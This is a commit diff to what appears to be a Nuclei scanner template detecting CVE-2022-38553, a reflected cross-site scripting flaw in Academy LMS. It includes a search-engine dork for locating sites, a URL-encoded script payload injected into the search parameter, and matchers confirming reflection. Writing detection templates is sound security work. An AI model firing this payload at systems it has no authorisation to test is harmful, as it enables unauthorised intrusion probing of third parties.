Update CVE-2022-38553.yaml

patch-1
Dhiyaneshwaran 2022-09-29 23:19:28 +05:30 committed by GitHub
parent 4abcc8e3d9
commit fe3bfd1276
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 10 deletions

View File

@ -13,26 +13,29 @@ info:
classification:
cve-id: CVE-2022-38553
metadata:
verified: true
google-query: intext:"Study any topic, anytime"
tags: cve,cve2022,academyLMS,xss
tags: cve,cve2022,academylms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'Study any topic'
condition: and
- type: word
part: header
words:
- "text/html"
- 'text/html'
- type: word
part: body
words:
- "<script>alert(1)</script>"
- type: status
status:
- 200